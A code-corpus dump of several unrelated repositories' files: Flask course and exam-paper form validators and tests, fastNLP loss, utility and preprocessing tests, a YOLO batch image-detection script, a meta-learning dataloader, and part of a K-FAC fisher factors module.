from wtforms.validators import DataRequired
from wtforms.validators import NumberRange
from wtforms.validators import ValidationError
from flaskapp import db
from flaskapp.models import Course
from flaskapp.models import Unit
def validate_course_name(form, course_name):
"""Validation of course name
Args:
form (FlaskForm): In which given description about course
course_name (StringField): Name of course
Raises:
ValidationError: If already exist then error of That Course is already exist. Please choose a different one. else add the course
"""
course = Course.query.filter(
and_(Course.name == course_name.data,
Course.teacher == current_user)).first()
if course:
raise ValidationError(
"That Course is already exist. Please choose a different one.")
def validate_unit_name(form, unit_name):
"""Validation on unit name of the course
Args:
form (FlaskForm): Form i which all the details of unit
unit_name (StringField): Name of unit that user want to add
Raises:
ValidationError: If already there then give error of That Unit is already exist. Please choose a different one. else add name of unit
"""
unit = Unit.query.filter(
and_(Unit.name == unit_name.data, Unit.course == form.course)).first()
if unit:
raise ValidationError(
"That Unit is already exist. Please choose a different one.")
def validate_chapter_no(form, chapter_no):
unit = Unit.query.filter(
and_(Unit.chapter_no == chapter_no.data,
Unit.course == form.course)).first()
if unit:
raise ValidationError(
"That Unit is already exist. Please choose a different one.")
units = Unit.query.filter(Unit.course == form.course).all()
if units:
max_chapter_no = max(map(lambda _unit: int(_unit.chapter_no), units))
if max_chapter_no and (max_chapter_no - chapter_no.data) < -1:
raise ValidationError(
f"Please crete unit:{max_chapter_no + 1} first.")
class CourseForm(FlaskForm):
course = StringField("Course",
validators=[DataRequired(), validate_course_name])
include_asked = BooleanField("Should paper include asked questions?")
submit = SubmitField("submit")
class UnitForm(FlaskForm):
chapter_no = IntegerField(
"Chapter No.",
validators=[
DataRequired(),
NumberRange(1, 101, "Units can't be more than 100"),
validate_chapter_no,
],
)
name = StringField("Name", validators=[DataRequired(), validate_unit_name])
submit = SubmitField("submit")
def __init__(self, course):
self.course = course
super().__init__()
```
#### File: test/papers/test_paper_generate_request.py
```python
from flask import json
from flaskapp.models import Paper
from test.main.base_classes import BaseMCQQuestion
from test.main.base_classes import BaseSubQuestion
from test.main.utils import test_post_request
class PaperGenerateRequest(BaseSubQuestion, BaseMCQQuestion):
def test_paper_generate_request(self):
data = dict(questions=[1, 2, 3], total_marks=30)
response = self.client.post(
"/course/1/papers/generate/request",
data=json.dumps(data),
headers={"Content-Type": "application/json"},
)
self.assertIn(
(b"You should be redirected automatically to target URL: "
b"<a href=/course/1/papers/generate/form/ >"),
response.data,
)
def test_handle_conflicting_questions(self):
data = dict(mcq={
"ask": [1, 3],
"nask": [2, 4]
},
sub={
"ask": [1, 3],
"nask": [2, 4]
})
response = self.client.post(
"/papers/handle/conflicts",
data=json.dumps(data),
headers={"Content-Type": "application/json"},
)
data1 = json.loads(response.get_data(as_text=True))
self.assertEqual(data1["status"], "OK")
def test_mark_distribution_form(self):
self.test_paper_generate_request()
data = {
"Unit:01": "30",
"Knowledge": "10",
"Comprehension": "10",
"Application": "10",
"Easy": "10",
"Medium": "10",
"Hard": "10",
"Que.1.A": "5",
"Que.2.A": "5",
"Que.2.B": "5",
"Que.3.A": "5",
"Que.3.B": "5",
"Que.3.C": "5",
"sub": 15,
"mcq": 15,
}
response, _ = test_post_request(self,
"/course/1/papers/generate/form/",
data)
self.assertIn(b"<title>Mark Distribution</title>", response.data)
response = self.client.post(
"/course/1/papers/confirm/template/",
data=json.dumps(dict(status="OK")),
headers={"Content-Type": "application/json"},
)
self.assertIn(
(b"You should be redirected automatically to target URL: "
b"<a href=/course/1/papers/generate/ >"),
response.data,
)
def test_generate_and_confirm_paper(self):
self.test_paper_generate_request()
self.test_mark_distribution_form()
data = {
"name": "paper1",
"term": "winter",
"exam_date": "2020-10-15",
"time_limit": "2",
}
test_post_request(self, "/course/1/papers/generate/", data, Paper, 1)
# testing gerenated paper
with self.mail.record_messages() as outbox:
data = {"generate": "YES", "examiner_email": "<EMAIL>"}
test_post_request(self, "papers/confirm/1", data=data)
self.assertEqual(1, len(outbox))
self.assertEqual("Paper for paper1", outbox[0].subject)
def test_pdf_paper(self):
self.test_paper_generate_request()
self.test_mark_distribution_form()
self.test_generate_and_confirm_paper()
response = self.client.get('/papers/1')
self.assertIn(b"Answer the following Multiple choice questions", response.data)
``` |
{
"source": "2017alan/fastNLP",
"score": 3
} |
#### File: fastNLP/core/loss.py
```python
import torch
class Loss(object):
"""Loss function of the algorithm,
either the wrapper of a loss function from framework, or a user-defined loss (need pytorch auto_grad support)
"""
def __init__(self, args):
"""
:param args: None or str, the name of a loss function.
"""
if args is None:
# this is useful when Trainer.__init__ performs type check
self._loss = None
elif isinstance(args, str):
self._loss = self._borrow_from_pytorch(args)
else:
raise NotImplementedError
def get(self):
"""
:return self._loss: the loss function
"""
return self._loss
@staticmethod
def _borrow_from_pytorch(loss_name):
"""Given a name of a loss function, return it from PyTorch.
:param loss_name: str, the name of a loss function
:return loss: a PyTorch loss
"""
if loss_name == "cross_entropy":
return torch.nn.CrossEntropyLoss()
elif loss_name == 'nll':
return torch.nn.NLLLoss()
else:
raise NotImplementedError
```
#### File: fastNLP/modules/utils.py
```python
from collections import defaultdict
import numpy as np
import torch
import torch.nn.init as init
import torch.nn as nn
def mask_softmax(matrix, mask):
if mask is None:
result = torch.nn.functional.softmax(matrix, dim=-1)
else:
raise NotImplementedError
return result
def initial_parameter(net ,initial_method =None):
if initial_method == 'xavier_uniform':
init_method = init.xavier_uniform_
elif initial_method=='xavier_normal':
init_method = init.xavier_normal_
elif initial_method == 'kaiming_normal' or initial_method =='msra':
init_method = init.kaiming_normal
elif initial_method == 'kaiming_uniform':
init_method = init.kaiming_normal
elif initial_method == 'orthogonal':
init_method = init.orthogonal_
elif initial_method == 'sparse':
init_method = init.sparse_
elif initial_method =='normal':
init_method = init.normal_
elif initial_method =='uniform':
initial_method = init.uniform_
else:
init_method = init.xavier_normal_
def weights_init(m):
# classname = m.__class__.__name__
if isinstance(m, nn.Conv2d) or isinstance(m,nn.Conv1d) or isinstance(m,nn.Conv3d): # for all the cnn
if initial_method != None:
init_method(m.weight.data)
else:
init.xavier_normal_(m.weight.data)
init.normal_(m.bias.data)
elif isinstance(m, nn.LSTM):
for w in m.parameters():
if len(w.data.size())>1:
init_method(w.data) # weight
else:
init.normal_(w.data) # bias
elif hasattr(m, 'weight') and m.weight.requires_grad:
init_method(m.weight.data)
else:
for w in m.parameters() :
if w.requires_grad:
if len(w.data.size())>1:
init_method(w.data) # weight
else:
init.normal_(w.data) # bias
# print("init else")
net.apply(weights_init)
def seq_mask(seq_len, max_len):
mask = [torch.ge(torch.LongTensor(seq_len), i + 1) for i in range(max_len)]
mask = torch.stack(mask, 1)
return mask
"""
Codes from FudanParser. Not tested. Do not use !!!
"""
def expand_gt(gt):
"""expand_gt: Expand ground truth to matrix
Arguments:
gt: tensor of (n, l)
Return:
f: ground truth matrix of (n, l), $gt[i][j] = k$ leads to $f[i][j][k] = 1$.
"""
n, l = gt.shape
ret = torch.zeros(n, l, l).long()
for i in range(n):
ret[i][torch.arange(l).long(), gt[i]] = 1
return ret
def greedy_decoding(arc_f):
"""greedy_decoding
Arguments:
arc_f: a tensor in shape of (n, l+1, l+1)
length of the sentence is l and index 0 is <root>
Output:
arc_pred: a tensor in shape of (n, l), indicating the head words
"""
f_arc = arc_f[:, 1:, :] # ignore the root
_, arc_pred = torch.max(f_arc.data, dim=-1, keepdim=False)
return arc_pred
def mst_decoding(arc_f):
batch_size = arc_f.shape[0]
length = arc_f.shape[1]
arc_score = arc_f.data.cpu()
pred_collection = []
for i in range(batch_size):
head = mst(arc_score[i].numpy())
pred_collection.append(head[1:].reshape((1, length - 1)))
arc_pred = torch.LongTensor(np.concatenate(pred_collection, axis=0)).type_as(arc_f).long()
return arc_pred
def outer_product(features):
"""InterProduct: Get inter sequence product of features
Arguments:
features: feature vectors of sequence in the shape of (n, l, h)
Return:
f: product result in (n, l, l, h) shape
"""
n, l, c = features.shape
features = features.contiguous()
x = features.view(n, l, 1, c)
x = x.expand(n, l, l, c)
y = features.view(n, 1, l, c).contiguous()
y = y.expand(n, l, l, c)
return x * y
def outer_concat(features):
"""InterProduct: Get inter sequence concatenation of features
Arguments:
features: feature vectors of sequence in the shape of (n, l, h)
Return:
f: product result in (n, l, l, h) shape
"""
n, l, c = features.shape
x = features.contiguous().view(n, l, 1, c)
x = x.expand(n, l, l, c)
y = features.view(n, 1, l, c)
y = y.expand(n, l, l, c)
return torch.cat((x, y), dim=3)
def mst(scores):
"""
https://github.com/tdozat/Parser/blob/0739216129cd39d69997d28cbc4133b360ea3934/lib/models/nn.py#L692 # NOQA
"""
length = scores.shape[0]
min_score = scores.min() - 1
eye = np.eye(length)
scores = scores * (1 - eye) + min_score * eye
heads = np.argmax(scores, axis=1)
heads[0] = 0
tokens = np.arange(1, length)
roots = np.where(heads[tokens] == 0)[0] + 1
if len(roots) < 1:
root_scores = scores[tokens, 0]
head_scores = scores[tokens, heads[tokens]]
new_root = tokens[np.argmax(root_scores / head_scores)]
heads[new_root] = 0
elif len(roots) > 1:
root_scores = scores[roots, 0]
scores[roots, 0] = 0
new_heads = np.argmax(scores[roots][:, tokens], axis=1) + 1
new_root = roots[np.argmin(
scores[roots, new_heads] / root_scores)]
heads[roots] = new_heads
heads[new_root] = 0
edges = defaultdict(set)
vertices = set((0,))
for dep, head in enumerate(heads[tokens]):
vertices.add(dep + 1)
edges[head].add(dep + 1)
for cycle in _find_cycle(vertices, edges):
dependents = set()
to_visit = set(cycle)
while len(to_visit) > 0:
node = to_visit.pop()
if node not in dependents:
dependents.add(node)
to_visit.update(edges[node])
cycle = np.array(list(cycle))
old_heads = heads[cycle]
old_scores = scores[cycle, old_heads]
non_heads = np.array(list(dependents))
scores[np.repeat(cycle, len(non_heads)),
np.repeat([non_heads], len(cycle), axis=0).flatten()] = min_score
new_heads = np.argmax(scores[cycle][:, tokens], axis=1) + 1
new_scores = scores[cycle, new_heads] / old_scores
change = np.argmax(new_scores)
changed_cycle = cycle[change]
old_head = old_heads[change]
new_head = new_heads[change]
heads[changed_cycle] = new_head
edges[new_head].add(changed_cycle)
edges[old_head].remove(changed_cycle)
return heads
def _find_cycle(vertices, edges):
"""
https://en.wikipedia.org/wiki/Tarjan%27s_strongly_connected_components_algorithm # NOQA
https://github.com/tdozat/Parser/blob/0739216129cd39d69997d28cbc4133b360ea3934/lib/etc/tarjan.py # NOQA
"""
_index = 0
_stack = []
_indices = {}
_lowlinks = {}
_onstack = defaultdict(lambda: False)
_SCCs = []
def _strongconnect(v):
nonlocal _index
_indices[v] = _index
_lowlinks[v] = _index
_index += 1
_stack.append(v)
_onstack[v] = True
for w in edges[v]:
if w not in _indices:
_strongconnect(w)
_lowlinks[v] = min(_lowlinks[v], _lowlinks[w])
elif _onstack[w]:
_lowlinks[v] = min(_lowlinks[v], _indices[w])
if _lowlinks[v] == _indices[v]:
SCC = set()
while True:
w = _stack.pop()
_onstack[w] = False
SCC.add(w)
if not (w != v):
break
_SCCs.append(SCC)
for v in vertices:
if v not in _indices:
_strongconnect(v)
return [SCC for SCC in _SCCs if len(SCC) > 1]
# https://github.com/alykhantejani/nninit/blob/master/nninit.py
def orthogonal(tensor, gain=1):
"""Fills the input Tensor or Variable with a (semi) orthogonal matrix. The input tensor must have at least 2 dimensions,
and for tensors with more than 2 dimensions the trailing dimensions are flattened. viewed as 2D representation with
rows equal to the first dimension and columns equal to the product of as a sparse matrix, where the non-zero elements
will be drawn from a normal distribution with mean=0 and std=`std`.
Reference: "Exact solutions to the nonlinear dynamics of learning in deep linear neural networks" - Saxe, A. et al.
Args:
tensor: a n-dimension torch.Tensor, where n >= 2
gain: optional gain to be applied
Examples:
>>> w = torch.Tensor(3, 5)
>>> nninit.orthogonal(w)
"""
if tensor.ndimension() < 2:
raise ValueError("Only tensors with 2 or more dimensions are supported.")
flattened_shape = (tensor.size(0), int(np.prod(tensor.detach().numpy().shape[1:])))
flattened = torch.Tensor(flattened_shape[0], flattened_shape[1]).normal_(0, 1)
u, s, v = np.linalg.svd(flattened.numpy(), full_matrices=False)
if u.shape == flattened.detach().numpy().shape:
tensor.view_as(flattened).copy_(torch.from_numpy(u))
else:
tensor.view_as(flattened).copy_(torch.from_numpy(v))
tensor.mul_(gain)
with torch.no_grad():
return tensor
def generate_step_dropout(masks, hidden_dim, step_dropout, training=False):
# assume batch first
# import pdb
# pdb.set_trace()
batch, length = masks.size()
if not training:
return torch.ones(batch, length, hidden_dim).fill_(1 - step_dropout).cuda(masks.device) * masks.view(batch,
length, 1)
masked = torch.zeros(batch, 1, hidden_dim).fill_(step_dropout)
masked = torch.bernoulli(masked).repeat(1, length, 1)
masked = masked.cuda(masks.device) * masks.view(batch, length, 1)
return masked
```
#### File: test/core/test_preprocess.py
```python
import os
import unittest
from fastNLP.core.dataset import DataSet
from fastNLP.core.preprocess import SeqLabelPreprocess
data = [
[['Tom', 'and', 'Jerry', '.'], ['n', '&', 'n', '.']],
[['Hello', 'world', '!'], ['a', 'n', '.']],
[['Tom', 'and', 'Jerry', '.'], ['n', '&', 'n', '.']],
[['Hello', 'world', '!'], ['a', 'n', '.']],
[['Tom', 'and', 'Jerry', '.'], ['n', '&', 'n', '.']],
[['Hello', 'world', '!'], ['a', 'n', '.']],
[['Tom', 'and', 'Jerry', '.'], ['n', '&', 'n', '.']],
[['Hello', 'world', '!'], ['a', 'n', '.']],
[['Tom', 'and', 'Jerry', '.'], ['n', '&', 'n', '.']],
[['Hello', 'world', '!'], ['a', 'n', '.']],
]
class TestCase1(unittest.TestCase):
def test(self):
if os.path.exists("./save"):
for root, dirs, files in os.walk("./save", topdown=False):
for name in files:
os.remove(os.path.join(root, name))
for name in dirs:
os.rmdir(os.path.join(root, name))
result = SeqLabelPreprocess().run(train_dev_data=data, train_dev_split=0.4,
pickle_path="./save")
self.assertEqual(len(result), 2)
self.assertEqual(type(result[0]), DataSet)
self.assertEqual(type(result[1]), DataSet)
os.system("rm -rf save")
print("pickle path deleted")
class TestCase2(unittest.TestCase):
def test(self):
if os.path.exists("./save"):
for root, dirs, files in os.walk("./save", topdown=False):
for name in files:
os.remove(os.path.join(root, name))
for name in dirs:
os.rmdir(os.path.join(root, name))
result = SeqLabelPreprocess().run(test_data=data, train_dev_data=data,
pickle_path="./save", train_dev_split=0.4,
cross_val=False)
self.assertEqual(len(result), 3)
self.assertEqual(type(result[0]), DataSet)
self.assertEqual(type(result[1]), DataSet)
self.assertEqual(type(result[2]), DataSet)
os.system("rm -rf save")
print("pickle path deleted")
class TestCase3(unittest.TestCase):
def test(self):
num_folds = 2
result = SeqLabelPreprocess().run(test_data=None, train_dev_data=data,
pickle_path="./save", train_dev_split=0.4,
cross_val=True, n_fold=num_folds)
self.assertEqual(len(result), 2)
self.assertEqual(len(result[0]), num_folds)
self.assertEqual(len(result[1]), num_folds)
for data_set in result[0] + result[1]:
self.assertEqual(type(data_set), DataSet)
os.system("rm -rf save")
print("pickle path deleted")
```
#### File: test/core/test_tester.py
```python
import os
import unittest
from fastNLP.core.dataset import DataSet
from fastNLP.core.field import TextField
from fastNLP.core.instance import Instance
from fastNLP.core.tester import SeqLabelTester
from fastNLP.models.sequence_modeling import SeqLabeling
data_name = "pku_training.utf8"
pickle_path = "data_for_tests"
class TestTester(unittest.TestCase):
def test_case_1(self):
model_args = {
"vocab_size": 10,
"word_emb_dim": 100,
"rnn_hidden_units": 100,
"num_classes": 5
}
valid_args = {"save_output": True, "validate_in_training": True, "save_dev_input": True,
"save_loss": True, "batch_size": 2, "pickle_path": "./save/",
"use_cuda": False, "print_every_step": 1}
train_data = [
[['a', 'b', 'c', 'd', 'e'], ['a', '@', 'c', 'd', 'e']],
[['a', '@', 'c', 'd', 'e'], ['a', '@', 'c', 'd', 'e']],
[['a', 'b', '#', 'd', 'e'], ['a', '@', 'c', 'd', 'e']],
[['a', 'b', 'c', '?', 'e'], ['a', '@', 'c', 'd', 'e']],
[['a', 'b', 'c', 'd', '$'], ['a', '@', 'c', 'd', 'e']],
[['!', 'b', 'c', 'd', 'e'], ['a', '@', 'c', 'd', 'e']],
]
vocab = {'a': 0, 'b': 1, 'c': 2, 'd': 3, 'e': 4, '!': 5, '@': 6, '#': 7, '$': 8, '?': 9}
label_vocab = {'a': 0, '@': 1, 'c': 2, 'd': 3, 'e': 4}
data_set = DataSet()
for example in train_data:
text, label = example[0], example[1]
x = TextField(text, False)
y = TextField(label, is_target=True)
ins = Instance(word_seq=x, label_seq=y)
data_set.append(ins)
data_set.index_field("word_seq", vocab)
data_set.index_field("label_seq", label_vocab)
model = SeqLabeling(model_args)
tester = SeqLabelTester(**valid_args)
tester.test(network=model, dev_data=data_set)
# If this can run, everything is OK.
os.system("rm -rf save")
print("pickle path deleted")
``` |
{
"source": "2017ND/k-yolov3",
"score": 3
} |
#### File: 2017ND/k-yolov3/detect_all.py
```python
import os
from yolo import YOLO
from PIL import Image
def detect_img(yolo):
pic_temp = []
pic = os.listdir(test_dir)
for name in pic:
pic_temp.append(name)
for i in range(len(pic_temp)):
img = test_dir + '/' + pic_temp[i]
image = Image.open(img)
detect = yolo.detect_image(image)
# detect.show()
detect.save(target_dir + '/' + pic_temp[i])
yolo.close_session()
return detect
if __name__ == '__main__':
test_dir = './test_img'
target_dir = './detect_results'
if not os.path.exists(target_dir):
os.mkdir(target_dir)
detect_img(YOLO())
``` |
{
"source": "2017pxy/Multimodal-Meta-Learning-for-Cold-Start-Sequential-Recommendation",
"score": 3
} |
#### File: data/dataloader/meta_learning_dataloader.py
```python
from collections import OrderedDict
import numpy as np
import torch
from recbole.data.interaction import Interaction
from recbole.data.dataloader.abstract_dataloader import AbstractDataLoader
class MetaLearningDataLoader(AbstractDataLoader):
def __init__(self, config, dataset, meta_learning_dataloaders, shuffle=True):
self.meta_learning_dataloaders = meta_learning_dataloaders
self.task_name = list(meta_learning_dataloaders.keys())
super(MetaLearningDataLoader, self).__init__(config, dataset, None, shuffle)
def _init_batch_size_and_step(self):
batch_size = self.config['train_batch_size']
self.step = batch_size
self.set_batch_size(batch_size)
@property
def pr_end(self):
return len(self.task_name)
def _shuffle(self):
"""Shuffle the order of data, and it will be called by :meth:`__iter__` if self.shuffle is True.
"""
np.random.shuffle(self.task_name)
def _next_batch_data(self):
"""Assemble next batch of data in form of Interaction, and return these data.
Returns:
Interaction: The next batch of data.
"""
tasks = self.task_name[self.pr:self.pr+self.step]
self.pr += self.step
result = OrderedDict()
for task in tasks:
result[task] = self.meta_learning_dataloaders[task]
return result
``` |
{
"source": "2018233031/kfac",
"score": 2
} |
#### File: python/ops/fisher_factors.py
```python
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import abc
import contextlib
import math
# Dependency imports
import numpy as np
import six
import tensorflow as tf
from collections import OrderedDict
from tensorflow.python.util import nest
from kfac.python.ops import linear_operator as lo
from tensorflow.python.training import moving_averages
from kfac.python.ops import utils
# Whether to initialize covariance estimators at a zero matrix (or the identity
# matrix).
INIT_COVARIANCES_AT_ZERO = True
# Whether to zero-debias the moving averages.
ZERO_DEBIAS = True
# Whether to initialize inverse (and other such matrices computed from the cov
# matrices) to the zero matrix (or the identity matrix). Initializing to
# zero is a safeguard against anything using the inverse before their first
# proper update, and so is preferred.
INIT_INVERSES_AT_ZERO = True
# When the number of inverses requested from a FisherFactor exceeds this value,
# the inverses are computed using an eigenvalue decomposition.
EIGENVALUE_DECOMPOSITION_THRESHOLD = 2
# Numerical eigenvalues computed from covariance matrix estimates are clipped to
# be at least as large as this value before they are used to compute inverses or
# matrix powers. Must be nonnegative.
EIGENVALUE_CLIPPING_THRESHOLD = 0.0
# When approximating conv layer input factor using spatially uncorrelated
# activations (`ConvInputSUAKroneckerfactor`) if this is True then assumes the
# activations to have zero mean.
ASSUME_ZERO_MEAN_ACTIVATIONS = False
# When approximating conv layer input factor using spatially uncorrelated
# activations (`ConvInputSUAKroneckerfactor`) if this is True then do
# mean subtraction from covariance matrix. Note this flag is only checked in the
# case where ASSUME_ZERO_MEAN_ACTIVATIONS is set to True. If
# ASSUME_ZERO_MEAN_ACTIVATIONS is False then mean is always subtracted from the
# covaraince matrix and this flag is redundant.
SUBTRACT_MEAN_CONTRIB_FROM_COV = True
# Subsample the inputs passed to the extract image patches. The number of
# inputs is normally batch_size. If _SUB_SAMPLE_INPUTS = True then
# the inputs will be randomly subsampled down to a total of
# _INPUTS_TO_EXTRACT_PATCHES_FACTOR * batch_size.
#
# Note that the value of _SUB_SAMPLE_INPUTS can be overridden locally for a
# particular layer by passing in an argument to the factor class (or the
# registration function for the corresponding layer).
_SUB_SAMPLE_INPUTS = False
_INPUTS_TO_EXTRACT_PATCHES_FACTOR = 0.2
# Subsample the extracted image patches during covariance estimation for
# input factors in conv layer. The number of patches subsampled will be
# calculated based on the following formula:
#
# if _SUB_SAMPLE_PATCHES:
# num_patches = min(_MAX_NUM_PATCHES,
# ceil(_MAX_NUM_PATCHES_PER_DIMENSION*dimension))
# else
# num_patches = total_patches
#
# where dimension is the number of rows (or columns) of the input factor matrix,
# which is typically the number of input channels times the number of pixels
# in a patch.
#
# Note that the value of _SUB_SAMPLE_PATCHES can be overridden locally for a
# particular layer by passing in an argument to the factor class (or the
# registration function for the corresponding layer).
_SUB_SAMPLE_PATCHES = False
_MAX_NUM_PATCHES = 10000000
_MAX_NUM_PATCHES_PER_DIMENSION = 3.0
# TOWER_STRATEGY can be one of "concat" or "separate". If "concat", the data
# passed to the factors from the blocks will be concatenated across towers
# (lazily via PartitionedTensor objects). Otherwise a tuple of tensors over
# towers will be passed in, and the factors will iterate over this and do the
# cov computations separately for each one, averaging the results together.
TOWER_STRATEGY = "separate"
#TOWER_STRATEGY = "concat"
# The variable scope names can be edited by passing a custom sanitizer function.
# By default the scope name is unchanged.
_GET_SANITIZED_NAME_FN = lambda x: x
def set_global_constants(init_covariances_at_zero=None,
zero_debias=None,
init_inverses_at_zero=None,
eigenvalue_decomposition_threshold=None,
eigenvalue_clipping_threshold=None,
assume_zero_mean_activations=None,
subtract_mean_contrib_from_cov=None,
sub_sample_inputs=None,
inputs_to_extract_patches_factor=None,
sub_sample_patches=None,
max_num_patches=None,
max_num_patches_per_dimension=None,
tower_strategy=None,
get_sanitized_name_fn=None):
"""Sets various global constants used by the classes in this module."""
global INIT_COVARIANCES_AT_ZERO
global ZERO_DEBIAS
global INIT_INVERSES_AT_ZERO
global EIGENVALUE_DECOMPOSITION_THRESHOLD
global EIGENVALUE_CLIPPING_THRESHOLD
global ASSUME_ZERO_MEAN_ACTIVATIONS
global SUBTRACT_MEAN_CONTRIB_FROM_COV
global _SUB_SAMPLE_INPUTS
global _INPUTS_TO_EXTRACT_PATCHES_FACTOR
global _SUB_SAMPLE_PATCHES
global _MAX_NUM_PATCHES
global _MAX_NUM_PATCHES_PER_DIMENSION
global _GET_SANITIZED_NAME_FN
global TOWER_STRATEGY
if init_covariances_at_zero is not None:
INIT_COVARIANCES_AT_ZERO = init_covariances_at_zero
if zero_debias is not None:
ZERO_DEBIAS = zero_debias
if init_inverses_at_zero is not None:
INIT_INVERSES_AT_ZERO = init_inverses_at_zero
if eigenvalue_decomposition_threshold is not None:
EIGENVALUE_DECOMPOSITION_THRESHOLD = eigenvalue_decomposition_threshold
if eigenvalue_clipping_threshold is not None:
EIGENVALUE_CLIPPING_THRESHOLD = eigenvalue_clipping_threshold
if assume_zero_mean_activations is not None:
ASSUME_ZERO_MEAN_ACTIVATIONS = assume_zero_mean_activations
if subtract_mean_contrib_from_cov is not None:
SUBTRACT_MEAN_CONTRIB_FROM_COV = subtract_mean_contrib_from_cov
if sub_sample_inputs is not None:
_SUB_SAMPLE_INPUTS = sub_sample_inputs
if inputs_to_extract_patches_factor is not None:
_INPUTS_TO_EXTRACT_PATCHES_FACTOR = inputs_to_extract_patches_factor
if sub_sample_patches is not None:
_SUB_SAMPLE_PATCHES = sub_sample_patches
if max_num_patches is not None:
_MAX_NUM_PATCHES = max_num_patches
if max_num_patches_per_dimension is not None:
_MAX_NUM_PATCHES_PER_DIMENSION = max_num_patches_per_dimension
if tower_strategy is not None:
TOWER_STRATEGY = tower_strategy
if get_sanitized_name_fn is not None:
_GET_SANITIZED_NAME_FN = get_sanitized_name_fn
def inverse_initializer(shape, dtype, partition_info=None): # pylint: disable=unused-argument
if INIT_INVERSES_AT_ZERO:
return tf.zeros(shape, dtype=dtype)
return tf.eye(num_rows=shape[0], dtype=dtype)
def covariance_initializer(shape, dtype, partition_info=None): # pylint: disable=unused-argument
if INIT_COVARIANCES_AT_ZERO:
return tf.zeros(shape, dtype=dtype)
return tf.eye(num_rows=shape[0], dtype=dtype)
def diagonal_covariance_initializer(shape, dtype, partition_info=None): # pylint: disable=unused-argument
if INIT_COVARIANCES_AT_ZERO:
return tf.zeros(shape, dtype=dtype)
return tf.ones(shape, dtype=dtype)
@contextlib.contextmanager
def maybe_place_on_device(device):
if device is not None and len(device) and TOWER_STRATEGY == "separate":
with tf.device(device):
yield
else:
yield
def compute_cov(tensor, tensor_right=None, normalizer=None):
"""Compute the empirical second moment of the rows of a 2D Tensor.
This function is meant to be applied to random matrices for which the true row
mean is zero, so that the true second moment equals the true covariance.
Args:
tensor: A 2D Tensor.
tensor_right: An optional 2D Tensor. If provided, this function computes
the matrix product tensor^T * tensor_right instead of tensor^T * tensor.
normalizer: optional scalar for the estimator (by default, the normalizer is
the number of rows of tensor).
Returns:
A square 2D Tensor with as many rows/cols as the number of input columns.
"""
if normalizer is None:
normalizer = utils.get_shape(tensor)[0]
if tensor_right is None:
cov = (
tf.matmul(tensor, tensor, transpose_a=True) / tf.cast(
normalizer, tensor.dtype))
return (cov + tf.transpose(cov)) / tf.cast(2.0, cov.dtype)
else:
return (tf.matmul(tensor, tensor_right, transpose_a=True) /
tf.cast(normalizer, tensor.dtype))
def append_homog(tensor, homog_value=None):
"""Appends a homogeneous coordinate to the last dimension of a Tensor.
Args:
tensor: A Tensor.
homog_value: Value to append as homogeneous coordinate to the last dimension
of `tensor`. If None 1.0 is used. (Default: None)
Returns:
A Tensor identical to the input but one larger in the last dimension. The
new entries are filled with ones.
"""
shape = tensor.shape.as_list()
rank = len(shape)
if any(elt is None for elt in shape):
shape = tf.concat([tf.shape(tensor)[:-1], [1]], axis=0)
else:
shape[-1] = 1
if homog_value is not None:
appendage = homog_value * tf.ones(shape, dtype=tensor.dtype)
else:
appendage = tf.ones(shape, dtype=tensor.dtype)
return tf.concat([tensor, appendage], axis=-1)
def accumulate_and_maybe_write(acc_var,
var,
tensor,
ema_decay,
weight,
should_write):
def write():
return tf.group(
var.add_to_average(acc_var.read_value_and_reset(),
decay=ema_decay,
weight=weight))
with tf.control_dependencies([acc_var.accumulate(tensor)]):
if isinstance(should_write, bool):
if should_write:
return write()
else:
return tf.no_op()
else:
return tf.cond(should_write, write, tf.no_op)
def scope_string_from_params(params):
"""Builds a variable scope string name from the given parameters.
Supported parameters are:
* tensors
* booleans
* ints
* strings
* depth-1 tuples/lists of ints
* any depth tuples/lists of tensors
Other parameter types will throw an error.
Args:
params: A parameter or list of parameters.
Returns:
A string to use for the variable scope.
Raises:
ValueError: if params includes an unsupported type.
"""
params = params if isinstance(params, (tuple, list)) else (params,)
name_parts = []
for param in params:
if param is None:
name_parts.append("None")
elif isinstance(param, (tuple, list)):
if all([isinstance(p, int) for p in param]):
name_parts.append("-".join([str(p) for p in param]))
else:
name_parts.append(scope_string_from_name(param))
elif isinstance(param, (six.string_types, int, bool)):
name_parts.append(str(param))
elif isinstance(param, (tf.Tensor, tf.Variable)):
name_parts.append(scope_string_from_name(param))
elif isinstance(param, utils.PartitionedTensor):
name_parts.append(scope_string_from_name(param.tensors))
else:
raise ValueError("Encountered an unsupported param {} of type {}".format(
param, type(param)))
return "_".join(name_parts)
def scope_string_from_name(tensor):
if isinstance(tensor, (tuple, list)):
return "__".join([scope_string_from_name(t) for t in tensor])
# "gradients/add_4_grad/Reshape:0/replica_0" ->
# "gradients_add_4_grad_Reshape_0_replica_0"
tensor_name = tensor.name.replace("/", "_").replace(":", "_")
return _GET_SANITIZED_NAME_FN(tensor_name)
def scalar_or_tensor_to_string(val):
return repr(val) if np.isscalar(val) else scope_string_from_name(val)
def list_to_string(lst):
return "_".join(val if isinstance(val, six.string_types)
else scalar_or_tensor_to_string(val) for val in lst)
def graph_func_to_id(func):
"""Returns a hashable object that represents func's computation."""
# TODO(b/74201126): replace with Topohash of func's output
return func.func_id
def graph_func_to_string(func):
# TODO(b/74201126): replace with Topohash of func's output
return list_to_string(func.func_id)
def _subsample_patches(patches, name=None):
"""Subsample a patches matrix.
Subsample an array of image patches. The number of patches subsampled will be
calculated based on the following formula:
num_patches = min(_MAX_NUM_PATCHES,
ceil(_MAX_NUM_PATCHES_PER_DIMENSION*dimension))
Args:
patches: Tensor, of shape `[total_patches, dimension]`.
name: `string`, Default (None)
Returns:
A tensor of shape `[num_patches, dimension]`.
Raises:
ValueError: If patches is not matrix-shaped.
ValueError: If total_patches cannot be inferred.
"""
with tf.name_scope(name, "subsample", [patches]):
patches = tf.convert_to_tensor(patches)
if len(patches.shape) != 2:
raise ValueError("Input param patches must be a matrix.")
total_patches = patches.shape.as_list()[0]
dimension = patches.shape.as_list()[1]
num_patches = min(_MAX_NUM_PATCHES,
int(math.ceil(_MAX_NUM_PATCHES_PER_DIMENSION*dimension)))
if total_patches is None:
total_patches = utils.get_shape(patches)[0]
should_subsample = tf.less(num_patches, total_patches)
return tf.cond(should_subsample,
lambda: _random_tensor_gather(patches, num_patches, name),
lambda: patches)
else:
if num_patches < total_patches:
return _random_tensor_gather(patches, num_patches, name)
else:
return patches
def _random_tensor_gather(array, num_ind, name=None):
"""Samples random indices of an array (along the first dimension).
Args:
array: Tensor of shape `[batch_size, ...]`.
num_ind: int. Number of indices to sample.
name: `string`. (Default: None)
Returns:
